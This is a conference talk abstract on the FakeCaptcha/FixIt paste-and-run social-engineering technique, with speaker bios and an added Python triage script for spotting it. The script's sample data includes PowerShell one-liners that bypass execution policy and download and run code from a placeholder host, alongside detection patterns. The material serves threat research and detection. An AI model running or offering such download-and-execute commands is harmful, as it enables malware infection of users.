Thursday 25 September 12:00 - 12:30, Red room
Dmitrij Lenz & Roberto Dasilva (Google)
Social engineering has historically been an integral part of many infection chains. Different techniques emerge within the field of social engineering, with some achieving widespread usage. This was observed with the "FakeCaptcha/FixIt" TTP during the latter half of 2024. "FakeCaptcha/FixIt" attacks involve tricking victims into copying commands from malicious websites or emails and then executing them in their command-line interface.
The TTP was so effective that multiple threat actors began to sell builders for these landing pages, with services tailored to different delivery mechanisms (e.g. email spam, malvertising). Simultaneously, several distinct internal implementations were discovered, each connected to a specific threat cluster. Finally, some actors utilize a drive-by distribution method and adopt only the narrative, while others combine the technique with other methods, such as FakeUpdate.
Although the attacks may look identical from the user's point of view, the exact implementations differ. This presentation details each implementation, including its infrastructure, observed stages, final payloads, and service component where one exists. Additionally, because most kits underwent continuous development throughout 2024 and 2025, we will illustrate how some implementations have evolved over time. Our pipelines enable reliable collection of malware distributed via FakeCaptcha, providing a statistical overview of the ecosystem and its players. We will also see how more espionage-oriented actors are embracing the same technique. Espionage kits are often built from readily available components found in crime FakeCaptcha kits, with the addition of more advanced cloaking mechanisms.
Finally, we will examine the factors that make this technique effective, such as the diminished value of the PowerShell execution policy and comments that resonate with the narrative, like "I am not a robot - reCAPTCHA Verification ID", placed after the command. Some attributes shared among the various implementations will be highlighted to help with monitoring and prevention.
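The shared attributes mentioned above can be turned into a simple command-line triage check. As an added example (not code from the talk), the Python below scores constructed process command lines for paste-and-run hallmarks and for the captcha-narrative trailing comment; the indicator names, weights and thresholds are assumptions of this example, not the speakers' own.

```python
import re

# Constructed sample process command lines (not taken from the talk). The last
# one mimics the FakeCaptcha/FixIt pattern: a pasted one-liner that fetches and
# runs remote content, followed by a comment echoing the "I am not a robot"
# narrative so the victim trusts what they pasted. Hosts are placeholders.
SAMPLE_COMMAND_LINES = [
    'powershell.exe -NoProfile -Command "Get-Date"',
    'powershell.exe -Command "Get-Process | Sort-Object CPU # top consumers"',
    'powershell.exe -w hidden -ep bypass -c "iex (iwr http://example.invalid/p)"',
    'powershell.exe -w hidden -ep bypass -c "iwr http://example.invalid/v | iex" '
    '# I am not a robot - reCAPTCHA Verification ID',
]


def _has(pattern):
    rx = re.compile(pattern, re.IGNORECASE)
    return lambda s: rx.search(s) is not None


_FETCH = re.compile(r"\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring)\b", re.I)
_INVOKE = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)

# (name, weight, predicate). Weights are assumed for this example: the trailing
# captcha-style comment is the strongest signal; the rest are generic hallmarks
# of a pasted one-liner (the victim supplies the execution-policy bypass itself).
INDICATORS = [
    ("captcha_comment", 3, _has(r"#.*not a robot.*verification")),
    ("execpolicy_bypass", 1, _has(r"-(?:ep|ex\w*)\s+(?:bypass|unrestricted)")),
    ("hidden_window", 1, _has(r"-w(?:indowstyle)?\s+hidden")),
    ("download_and_run", 1, lambda s: bool(_FETCH.search(s) and _INVOKE.search(s))),
]


def score_command_line(cmdline):
    """Return (score, matched indicator names) for one process command line."""
    hits = [name for name, _, match in INDICATORS if match(cmdline)]
    return sum(w for name, w, _ in INDICATORS if name in hits), hits


def classify(cmdline):
    """Map a command line to a verdict; the comment alone is decisive."""
    score, hits = score_command_line(cmdline)
    if "captcha_comment" in hits:
        return "fakecaptcha_likely"
    return "suspicious" if score >= 2 else "benign"


def triage(cmdlines=SAMPLE_COMMAND_LINES):
    """Classify each command line; returns a list of (verdict, score, hits)."""
    return [(classify(c),) + score_command_line(c) for c in cmdlines]


if __name__ == "__main__":
    for verdict, score, hits in triage():
        print(f"{verdict:<20} score={score} hits={hits}")
```

The check is meant for process-creation telemetry or Run-dialog history; the same patterns also work as a starting point for a SIEM rule.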
Dmitrij Lenz is a cyber threat expert with an interest in the crime ecosystem. In his research, Dmitrij analyses the mechanisms that facilitate the operations of threat actors, including botnets, loaders, and C2 platforms, among others. At the Google Threat Analysis Group, his responsibilities revolve around tracking and disrupting extortion campaigns and associated antecedent activities.
Roberto Dasilva brings more than a decade of combined expertise in cybersecurity, including incident response, SOC analysis, malware analysis, and threat intelligence. He has also shared his knowledge as a Master's degree teacher and presented at various industry conferences. For the past three years, Roberto has been a valuable member of the Threat Intelligence department at Google.
Back to VB2025 conference page